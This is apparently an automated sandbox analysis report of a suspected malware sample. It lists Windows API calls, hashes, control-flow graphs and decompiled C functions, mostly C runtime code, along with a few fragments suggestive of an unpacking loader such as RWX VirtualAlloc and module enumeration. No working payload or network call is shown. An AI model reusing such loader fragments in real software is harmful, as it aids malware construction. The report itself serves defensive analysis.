                            • Opcode Fuzzy Hash: a95b220d2d9c14b1a5c56d8a9dfd7e07f088015f43c1402ade5625b42879af68
                            • Instruction Fuzzy Hash: 67F0BE21A0030662CA15BB61EC06D8E3B688F4031CB6000BFE811761D2CFBCEA55859E
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 285 858356-85836f 286 858371-858373 285->286 287 858375 286->287 288 85837a-858386 CreateToolhelp32Snapshot 286->288 287->288 289 858396-8583a3 Module32First 288->289 290 858388-85838e 288->290 291 8583a5-8583a6 call 858015 289->291 292 8583ac-8583b4 289->292 290->289 295 858390-858394 290->295 296 8583ab 291->296 295->286 295->289 296->292
                            APIs
                            • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0085837E
                            • Module32First.KERNEL32(00000000,00000224), ref: 0085839E
                            Memory Dump Source
                            • Source File: 00000002.00000002.288363449.0000000000857000.00000040.00000020.00020000.00000000.sdmp, Offset: 00857000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_857000_afCf.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateFirstModule32SnapshotToolhelp32
                            • String ID:
                            • API String ID: 3833638111-0
                            • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                            • Instruction ID: c67fd692da50ddaadce7009c11f9efb0feba296b8ca29329d2d3b4d6e204426f
                            • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                            • Instruction Fuzzy Hash: 0CF06835100714EFD7203AB59C8DBAE76E8FF49726F100529EA42E11C0DF70E9494651
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 298 660e0f-660e24 SetErrorMode * 2 299 660e26 298->299 300 660e2b-660e2c 298->300 299->300
                            APIs
                            • SetErrorMode.KERNELBASE(00000400,?,?,00660223,?,?), ref: 00660E19
                            • SetErrorMode.KERNELBASE(00000000,?,?,00660223,?,?), ref: 00660E1E
                            Memory Dump Source
                            • Source File: 00000002.00000002.287974900.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_660000_afCf.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorMode
                            • String ID:
                            • API String ID: 2340568224-0
                            • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                            • Instruction ID: ee078584dca13e788e7d6e14266956c172b54066e7d8b192639a4a5066c8a46f
                            • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                            • Instruction Fuzzy Hash: 8CD0123154512877D7002A94DC09BCE7B1CDF05B62F008421FB0DD9180C771994046E5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 301 40e7ee-40e7f6 call 40e7c3 303 40e7fb-40e7ff ExitProcess 301->303
                            C-Code - Quality: 100%
                            			E0040E7EE(int _a4) {
                            
                            				E0040E7C3(_a4); // executed
                            				ExitProcess(_a4);
                            			}



                            0x0040e7f6
                            0x0040e7ff

                            APIs
                            • ___crtCorExitProcess.LIBCMT ref: 0040E7F6
                              • Part of subcall function 0040E7C3: GetModuleHandleW.KERNEL32(mscoree.dll,?,0040E7FB,00000001,?,0040B886,000000FF,0000001E,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018), ref: 0040E7CD
                              • Part of subcall function 0040E7C3: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0040E7DD
                              • Part of subcall function 0040E7C3: CorExitProcess.MSCOREE(00000001,?,0040E7FB,00000001,?,0040B886,000000FF,0000001E,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018), ref: 0040E7EA
                            • ExitProcess.KERNEL32 ref: 0040E7FF
                            Memory Dump Source
                            • Source File: 00000002.00000002.287575754.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000002.00000002.287575754.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.287575754.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_afCf.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitProcess$AddressHandleModuleProc___crt
                            • String ID:
                            • API String ID: 2427264223-0
                            • Opcode ID: 65da83064d662722dc3cf0b1a9484b1fe75efcd2066e1800ec5593f74242e35d
                            • Instruction ID: d9ec683f250bcd397ae0bae66fbc2b9097e114182cfe22e5ca4178904d999afd
                            • Opcode Fuzzy Hash: 65da83064d662722dc3cf0b1a9484b1fe75efcd2066e1800ec5593f74242e35d
                            • Instruction Fuzzy Hash: ADB09B31000108BFDB112F13DC09C493F59DB40750711C435F41805071DF719D5195D5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 455 40d534-40d556 HeapCreate 456 40d558-40d559 455->456 457 40d55a-40d563 455->457
                            C-Code - Quality: 100%
                            			E0040D534(intOrPtr _a4) {
                            				void* _t6;
                            
                            				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
                            				 *0x4234b4 = _t6;
                            				if(_t6 != 0) {
                            					 *0x4250b0 = 1;
                            					return 1;
                            				} else {
                            					return _t6;
                            				}
                            			}




                            0x0040d549
                            0x0040d54f
                            0x0040d556
                            0x0040d55d
                            0x0040d563
                            0x0040d559
                            0x0040d559
                            0x0040d559

                            APIs
                            • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0040D549
                            Memory Dump Source
                            • Source File: 00000002.00000002.287575754.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000002.00000002.287575754.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.287575754.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_afCf.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateHeap
                            • String ID:
                            • API String ID: 10892065-0
                            • Opcode ID: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
                            • Instruction ID: a29dbb507fbbbc11cf477c5ad410ace9233c9b691e3651c0b65acef059567112
                            • Opcode Fuzzy Hash: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
                            • Instruction Fuzzy Hash: E8D05E36A54348AADB11AFB47C08B623BDCE388396F404576F80DC6290F678D641C548
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 458 40ea0a-40ea16 call 40e8de 460 40ea1b-40ea1f 458->460
                            C-Code - Quality: 25%
                            			E0040EA0A(intOrPtr _a4) {
                            				void* __ebp;
                            				void* _t2;
                            				void* _t3;
                            				void* _t4;
                            				void* _t5;
                            				void* _t8;
                            
                            				_push(0);
                            				_push(0);
                            				_push(_a4);
                            				_t2 = E0040E8DE(_t3, _t4, _t5, _t8); // executed
                            				return _t2;
                            			}









                            0x0040ea0f
                            0x0040ea11
                            0x0040ea13
                            0x0040ea16
                            0x0040ea1f

                            APIs
                            • _doexit.LIBCMT ref: 0040EA16
                              • Part of subcall function 0040E8DE: __lock.LIBCMT ref: 0040E8EC
                              • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E923
                              • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E938
                              • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E962
                              • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E978
                              • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E985
                              • Part of subcall function 0040E8DE: __initterm.LIBCMT ref: 0040E9B4
                              • Part of subcall function 0040E8DE: __initterm.LIBCMT ref: 0040E9C4
                            Memory Dump Source
                            • Source File: 00000002.00000002.287575754.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000002.00000002.287575754.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.287575754.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_afCf.jbxd
                            Yara matches
                            Similarity
                            • API ID: __decode_pointer$__initterm$__lock_doexit
                            • String ID:
                            • API String ID: 1597249276-0
                            • Opcode ID: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                            • Instruction ID: a0257ab8b89ab24c4dda27abc63ac43d0f25756bab2839dd78a8b277d7454467
                            • Opcode Fuzzy Hash: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                            • Instruction Fuzzy Hash: D2B0923298420833EA202643AC03F063B1987C0B64E244031BA0C2E1E1A9A2A9618189
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 461 660920-660929 TerminateProcess
                            APIs
                            • TerminateProcess.KERNELBASE(000000FF,00000000), ref: 00660929
                            Memory Dump Source
                            • Source File: 00000002.00000002.287974900.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_660000_afCf.jbxd
                            Yara matches
                            Similarity
                            • API ID: ProcessTerminate
                            • String ID:
                            • API String ID: 560597551-0
                            • Opcode ID: fd9d0b8adc6ee4511e0d88a5c93671c763186c68bf04d018142ae61394c9d474
                            • Instruction ID: aa9ae74a4f9dd512805a3ac25890d2e047966d6f9f9abded32641ce094baad92
                            • Opcode Fuzzy Hash: fd9d0b8adc6ee4511e0d88a5c93671c763186c68bf04d018142ae61394c9d474
                            • Instruction Fuzzy Hash: 6E9004703C415011DC303DDC0C01F0540011751734F3007107174FD1F4DC50DF004115
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 462 858015-85804f call 858328 465 858051-858084 VirtualAlloc call 8580a2 462->465 466 85809d 462->466 468 858089-85809b 465->468 466->466 468->466
                            APIs
                            • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 00858066
                            Memory Dump Source
                            • Source File: 00000002.00000002.288363449.0000000000857000.00000040.00000020.00020000.00000000.sdmp, Offset: 00857000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_857000_afCf.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocVirtual
                            • String ID:
                            • API String ID: 4275171209-0
                            • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                            • Instruction ID: 6f86723e0b9422f09094e4c4f9c2bf75ae724210ad6acf8683c93dbd09eb7f24
                            • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                            • Instruction Fuzzy Hash: EF113F79A00208EFDB01DF98C985E98BBF5EF08751F158095F948AB361D771EA54DF80
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • IsDebuggerPresent.KERNEL32 ref: 0067395B
                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00673970
                            • UnhandledExceptionFilter.KERNEL32(0041FB80), ref: 0067397B
                            • GetCurrentProcess.KERNEL32(C0000409), ref: 00673997
                            • TerminateProcess.KERNEL32(00000000), ref: 0067399E
                            Memory Dump Source
                            • Source File: 00000002.00000002.287974900.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_660000_afCf.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                            • String ID:
                            • API String ID: 2579439406-0
                            • Opcode ID: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                            • Instruction ID: 70533cb49244659168647d2e956881ae8619b6ceb161c6a67a0618a4ed87ac76
                            • Opcode Fuzzy Hash: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                            • Instruction Fuzzy Hash: 9421D2B8A01204EFD720DF64E94A6857FB0FB08356F904079E50D87762E7B96A82CF4D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 85%
                            			E0040CE09(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                            				intOrPtr _v0;
                            				void* _v804;
                            				intOrPtr _v808;
                            				intOrPtr _v812;
                            				intOrPtr _t6;
                            				intOrPtr _t11;
                            				intOrPtr _t12;
                            				intOrPtr _t13;
                            				long _t17;
                            				intOrPtr _t21;
                            				intOrPtr _t22;
                            				intOrPtr _t25;
                            				intOrPtr _t26;
                            				intOrPtr _t27;
                            				intOrPtr* _t31;
                            				void* _t34;
                            
                            				_t27 = __esi;
                            				_t26 = __edi;
                            				_t25 = __edx;
                            				_t22 = __ecx;
                            				_t21 = __ebx;
                            				_t6 = __eax;
                            				_t34 = _t22 -  *0x422234; // 0x7fac3580
                            				if(_t34 == 0) {
                            					asm("repe ret");
                            				}
                            				 *0x423b98 = _t6;
                            				 *0x423b94 = _t22;
                            				 *0x423b90 = _t25;
                            				 *0x423b8c = _t21;
                            				 *0x423b88 = _t27;
                            				 *0x423b84 = _t26;
                            				 *0x423bb0 = ss;
                            				 *0x423ba4 = cs;
                            				 *0x423b80 = ds;
                            				 *0x423b7c = es;
                            				 *0x423b78 = fs;
                            				 *0x423b74 = gs;
                            				asm("pushfd");
                            				_pop( *0x423ba8);
                            				 *0x423b9c =  *_t31;
                            				 *0x423ba0 = _v0;
                            				 *0x423bac =  &_a4;
                            				 *0x423ae8 = 0x10001;
                            				_t11 =  *0x423ba0; // 0x0
                            				 *0x423a9c = _t11;
                            				 *0x423a90 = 0xc0000409;
                            				 *0x423a94 = 1;
                            				_t12 =  *0x422234; // 0x7fac3580
                            				_v812 = _t12;
                            				_t13 =  *0x422238; // 0x8053ca7f
                            				_v808 = _t13;
                            				 *0x423ae0 = IsDebuggerPresent();
                            				_push(1);
                            				E004138FC(_t14);
                            				SetUnhandledExceptionFilter(0);
                            				_t17 = UnhandledExceptionFilter(0x41fb80);
                            				if( *0x423ae0 == 0) {
                            					_push(1);
                            					E004138FC(_t17);
                            				}
                            				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                            			}



















                            0x0040ce09
                            0x0040ce09
                            0x0040ce09
                            0x0040ce09
                            0x0040ce09
                            0x0040ce09
                            0x0040ce09
                            0x0040ce0f
                            0x0040ce11
                            0x0040ce11
                            0x00413644
                            0x00413649
                            0x0041364f
                            0x00413655
                            0x0041365b
                            0x00413661
                            0x00413667
                            0x0041366e
                            0x00413675
                            0x0041367c
                            0x00413683
                            0x0041368a
                            0x00413691
                            0x00413692
                            0x0041369b
                            0x004136a3
                            0x004136ab
                            0x004136b6
                            0x004136c0
                            0x004136c5
                            0x004136ca
                            0x004136d4
                            0x004136de
                            0x004136e3
                            0x004136e9
                            0x004136ee
                            0x004136fa
                            0x004136ff
                            0x00413701
                            0x00413709
                            0x00413714
                            0x00413721
                            0x00413723
                            0x00413725
                            0x0041372a
                            0x0041373e

                            APIs
                            • IsDebuggerPresent.KERNEL32 ref: 004136F4
                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00413709
                            • UnhandledExceptionFilter.KERNEL32(0041FB80), ref: 00413714
                            • GetCurrentProcess.KERNEL32(C0000409), ref: 00413730
                            • TerminateProcess.KERNEL32(00000000), ref: 00413737
                            Memory Dump Source
                            • Source File: 00000002.00000002.287575754.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000002.00000002.287575754.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.287575754.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_afCf.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                            • String ID:
                            • API String ID: 2579439406-0
                            • Opcode ID: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                            • Instruction ID: 93bf0ba95bc2a0faef8203f21c221f33afe887fd41373e09ae0fa508b254143b
                            • Opcode Fuzzy Hash: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                            • Instruction Fuzzy Hash: A521C3B4601204EFD720DF65E94A6457FB4FB08356F80407AE50887772E7B86682CF4D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E0040ADB0(intOrPtr* __ecx) {
                            				void* _t5;
                            				intOrPtr* _t11;
                            
                            				_t11 = __ecx;
                            				_t5 =  *(__ecx + 8);
                            				 *__ecx = 0x41eff0;
                            				if(_t5 != 0) {
                            					_t5 =  *((intOrPtr*)( *((intOrPtr*)( *_t5 + 8))))(_t5);
                            				}
                            				if( *(_t11 + 0xc) != 0) {
                            					_t5 = GetProcessHeap();
                            					if(_t5 != 0) {
                            						return HeapFree(_t5, 0,  *(_t11 + 0xc));
                            					}
                            				}
                            				return _t5;
                            			}





                            0x0040adb3
                            0x0040adb5
                            0x0040adb8
                            0x0040adc0
                            0x0040adc8
                            0x0040adc8
                            0x0040adce
                            0x0040add0
                            0x0040add8
                            0x00000000
                            0x0040ade1
                            0x0040add8
                            0x0040ade8

                            APIs
                            • GetProcessHeap.KERNEL32 ref: 0040ADD0
                            • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040ADE1
                            Memory Dump Source
                            • Source File: 00000002.00000002.287575754.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000002.00000002.287575754.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.287575754.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_afCf.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$FreeProcess
                            • String ID:
                            • API String ID: 3859560861-0
                            • Opcode ID: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
                            • Instruction ID: 72dd180cd7110ee49b406fd12918c6a771032a3efea8c67e715e4993f3fed615
                            • Opcode Fuzzy Hash: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
                            • Instruction Fuzzy Hash: 54E09A312003009FC320AB61DC08FA337AAEF88311F04C829E55A936A0DB78EC42CB58
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000002.00000002.288363449.0000000000857000.00000040.00000020.00020000.00000000.sdmp, Offset: 00857000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_857000_afCf.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                            • Instruction ID: 6930b6fe8ce4ca5ba99d8027fe1f9e99cbbbb8ba2109a381dbbcf1da881d0b26
                            • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                            • Instruction Fuzzy Hash: 8B118E72344100AFDB44DF59ECC1EA673EAFB89321B2980A5ED08CB312E675EC41C760
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000002.00000002.287974900.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_660000_afCf.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                            • Instruction ID: a60c24d993cbccf98a249165d32e4b252ecb079773f30f13a6df0b1f2fa8fb70
                            • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                            • Instruction Fuzzy Hash: 1A018F76A006148FEB21CF64C804BEB33AAEF86316F4545B5D90A97281E774A9418B90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 86%
                            			E00417081(short* __ecx, int _a4, signed int _a8, char* _a12, int _a16, char* _a20, int _a24, int _a28, intOrPtr _a32) {
                            				signed int _v8;
                            				int _v12;
                            				int _v16;
                            				int _v20;
                            				intOrPtr _v24;
                            				void* _v36;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				void* __ebp;
                            				signed int _t110;
                            				intOrPtr _t112;
                            				intOrPtr _t113;
                            				short* _t115;
                            				short* _t116;
                            				char* _t120;
                            				short* _t121;
                            				short* _t123;
                            				short* _t127;
                            				int _t128;
                            				short* _t141;
                            				signed int _t144;
                            				void* _t146;
                            				short* _t147;
                            				signed int _t150;
                            				short* _t153;
                            				char* _t157;
                            				int _t160;
                            				long _t162;
                            				signed int _t174;
                            				signed int _t178;
                            				signed int _t179;
                            				int _t182;
                            				short* _t184;
                            				signed int _t186;
                            				signed int _t188;
                            				short* _t189;
                            				int _t191;
                            				intOrPtr _t194;
                            				int _t207;
                            
                            				_t110 =  *0x422234; // 0x7fac3580
                            				_v8 = _t110 ^ _t188;
                            				_t184 = __ecx;
                            				_t194 =  *0x423e7c; // 0x1
                            				if(_t194 == 0) {
                            					_t182 = 1;
                            					if(LCMapStringW(0, 0x100, 0x420398, 1, 0, 0) == 0) {
                            						_t162 = GetLastError();
                            						__eflags = _t162 - 0x78;
                            						if(_t162 == 0x78) {
                            							 *0x423e7c = 2;
                            						}
                            					} else {
                            						 *0x423e7c = 1;
                            					}
                            				}
                            				if(_a16 <= 0) {
                            					L13:
                            					_t112 =  *0x423e7c; // 0x1
                            					if(_t112 == 2 || _t112 == 0) {
                            						_v16 = 0;
                            						_v20 = 0;
                            						__eflags = _a4;
                            						if(_a4 == 0) {
                            							_a4 =  *((intOrPtr*)( *_t184 + 0x14));
                            						}
                            						__eflags = _a28;
                            						if(_a28 == 0) {
                            							_a28 =  *((intOrPtr*)( *_t184 + 4));
                            						}
                            						_t113 = E00417A20(0, _t179, _t182, _t184, _a4);
                            						_v24 = _t113;
                            						__eflags = _t113 - 0xffffffff;
                            						if(_t113 != 0xffffffff) {
                            							__eflags = _t113 - _a28;
                            							if(_t113 == _a28) {
                            								_t184 = LCMapStringA(_a4, _a8, _a12, _a16, _a20, _a24);
                            								L78:
                            								__eflags = _v16;
                            								if(__eflags != 0) {
                            									_push(_v16);
                            									E0040B6B5(0, _t182, _t184, __eflags);
                            								}
                            								_t115 = _v20;
                            								__eflags = _t115;
                            								if(_t115 != 0) {
                            									__eflags = _a20 - _t115;
                            									if(__eflags != 0) {
                            										_push(_t115);
                            										E0040B6B5(0, _t182, _t184, __eflags);
                            									}
                            								}
                            								_t116 = _t184;
                            								goto L84;
                            							}
                            							_t120 = E00417A69(_t179, _a28, _t113, _a12,  &_a16, 0, 0);
                            							_t191 =  &(_t189[0xc]);
                            							_v16 = _t120;
                            							__eflags = _t120;
                            							if(_t120 == 0) {
                            								goto L58;
                            							}
                            							_t121 = LCMapStringA(_a4, _a8, _t120, _a16, 0, 0);
                            							_v12 = _t121;
                            							__eflags = _t121;
                            							if(__eflags != 0) {
                            								if(__eflags <= 0) {
                            									L71:
                            									_t182 = 0;
                            									__eflags = 0;
                            									L72:
                            									__eflags = _t182;
                            									if(_t182 == 0) {
                            										goto L62;
                            									}
                            									E0040BA30(_t182, _t182, 0, _v12);
                            									_t123 = LCMapStringA(_a4, _a8, _v16, _a16, _t182, _v12);
                            									_v12 = _t123;
                            									__eflags = _t123;
                            									if(_t123 != 0) {
                            										_t186 = E00417A69(_t179, _v24, _a28, _t182,  &_v12, _a20, _a24);
                            										_v20 = _t186;
                            										asm("sbb esi, esi");
                            										_t184 =  ~_t186 & _v12;
                            										__eflags = _t184;
                            									} else {
                            										_t184 = 0;
                            									}
                            									E004147AE(_t182);
                            									goto L78;
                            								}
                            								__eflags = _t121 - 0xffffffe0;
                            								if(_t121 > 0xffffffe0) {
                            									goto L71;
                            								}
                            								_t127 =  &(_t121[4]);
                            								__eflags = _t127 - 0x400;
                            								if(_t127 > 0x400) {
                            									_t128 = E0040B84D(0, _t179, _t182, _t127);
                            									__eflags = _t128;
                            									if(_t128 != 0) {
                            										 *_t128 = 0xdddd;
                            										_t128 = _t128 + 8;
                            										__eflags = _t128;
                            									}
                            									_t182 = _t128;
                            									goto L72;
                            								}
                            								E0040CFB0(_t127);
                            								_t182 = _t191;
                            								__eflags = _t182;
                            								if(_t182 == 0) {
                            									goto L62;
                            								}
                            								 *_t182 = 0xcccc;
                            								_t182 = _t182 + 8;
                            								goto L72;
                            							}
                            							L62:
                            							_t184 = 0;
                            							goto L78;
                            						} else {
                            							goto L58;
                            						}
                            					} else {
                            						if(_t112 != 1) {
                            							L58:
                            							_t116 = 0;
                            							L84:
                            							return E0040CE09(_t116, 0, _v8 ^ _t188, _t179, _t182, _t184);
                            						}
                            						_v12 = 0;
                            						if(_a28 == 0) {
                            							_a28 =  *((intOrPtr*)( *_t184 + 4));
                            						}
                            						_t184 = MultiByteToWideChar;
                            						_t182 = MultiByteToWideChar(_a28, 1 + (0 | _a32 != 0x00000000) * 8, _a12, _a16, 0, 0);
                            						_t207 = _t182;
                            						if(_t207 == 0) {
                            							goto L58;
                            						} else {
                            							if(_t207 <= 0) {
                            								L28:
                            								_v16 = 0;
                            								L29:
                            								if(_v16 == 0) {
                            									goto L58;
                            								}
                            								if(MultiByteToWideChar(_a28, 1, _a12, _a16, _v16, _t182) == 0) {
                            									L52:
                            									E004147AE(_v16);
                            									_t116 = _v12;
                            									goto L84;
                            								}
                            								_t184 = LCMapStringW;
                            								_t174 = LCMapStringW(_a4, _a8, _v16, _t182, 0, 0);
                            								_v12 = _t174;
                            								if(_t174 == 0) {
                            									goto L52;
                            								}
                            								if((_a8 & 0x00000400) == 0) {
                            									__eflags = _t174;
                            									if(_t174 <= 0) {
                            										L44:
                            										_t184 = 0;
                            										__eflags = 0;
                            										L45:
                            										__eflags = _t184;
                            										if(_t184 != 0) {
                            											_t141 = LCMapStringW(_a4, _a8, _v16, _t182, _t184, _v12);
                            											__eflags = _t141;
                            											if(_t141 != 0) {
                            												_push(0);
                            												_push(0);
                            												__eflags = _a24;
                            												if(_a24 != 0) {
                            													_push(_a24);
                            													_push(_a20);
                            												} else {
                            													_push(0);
                            													_push(0);
                            												}
                            												_v12 = WideCharToMultiByte(_a28, 0, _t184, _v12, ??, ??, ??, ??);
                            											}
                            											E004147AE(_t184);
                            										}
                            										goto L52;
                            									}
                            									_t144 = 0xffffffe0;
                            									_t179 = _t144 % _t174;
                            									__eflags = _t144 / _t174 - 2;
                            									if(_t144 / _t174 < 2) {
                            										goto L44;
                            									}
                            									_t52 = _t174 + 8; // 0x8
                            									_t146 = _t174 + _t52;
                            									__eflags = _t146 - 0x400;
                            									if(_t146 > 0x400) {
                            										_t147 = E0040B84D(0, _t179, _t182, _t146);
                            										__eflags = _t147;
                            										if(_t147 != 0) {
                            											 *_t147 = 0xdddd;
                            											_t147 =  &(_t147[4]);
                            											__eflags = _t147;
                            										}
                            										_t184 = _t147;
                            										goto L45;
                            									}
                            									E0040CFB0(_t146);
                            									_t184 = _t189;
                            									__eflags = _t184;
                            									if(_t184 == 0) {
                            										goto L52;
                            									}
                            									 *_t184 = 0xcccc;
                            									_t184 =  &(_t184[4]);
                            									goto L45;
                            								}
                            								if(_a24 != 0 && _t174 <= _a24) {
                            									LCMapStringW(_a4, _a8, _v16, _t182, _a20, _a24);
                            								}
                            								goto L52;
                            							}
                            							_t150 = 0xffffffe0;
                            							_t179 = _t150 % _t182;
                            							if(_t150 / _t182 < 2) {
                            								goto L28;
                            							}
                            							_t25 = _t182 + 8; // 0x8
                            							_t152 = _t182 + _t25;
                            							if(_t182 + _t25 > 0x400) {
                            								_t153 = E0040B84D(0, _t179, _t182, _t152);
                            								__eflags = _t153;
                            								if(_t153 == 0) {
                            									L27:
                            									_v16 = _t153;
                            									goto L29;
                            								}
                            								 *_t153 = 0xdddd;
                            								L26:
                            								_t153 =  &(_t153[4]);
                            								goto L27;
                            							}
                            							E0040CFB0(_t152);
                            							_t153 = _t189;
                            							if(_t153 == 0) {
                            								goto L27;
                            							}
                            							 *_t153 = 0xcccc;
                            							goto L26;
                            						}
                            					}
                            				}
                            				_t178 = _a16;
                            				_t157 = _a12;
                            				while(1) {
                            					_t178 = _t178 - 1;
                            					if( *_t157 == 0) {
                            						break;
                            					}
                            					_t157 =  &(_t157[1]);
                            					if(_t178 != 0) {
                            						continue;
                            					}
                            					_t178 = _t178 | 0xffffffff;
                            					break;
                            				}
                            				_t160 = _a16 - _t178 - 1;
                            				if(_t160 < _a16) {
                            					_t160 = _t160 + 1;
                            				}
                            				_a16 = _t160;
                            				goto L13;
                            			}











































                            0x00417089
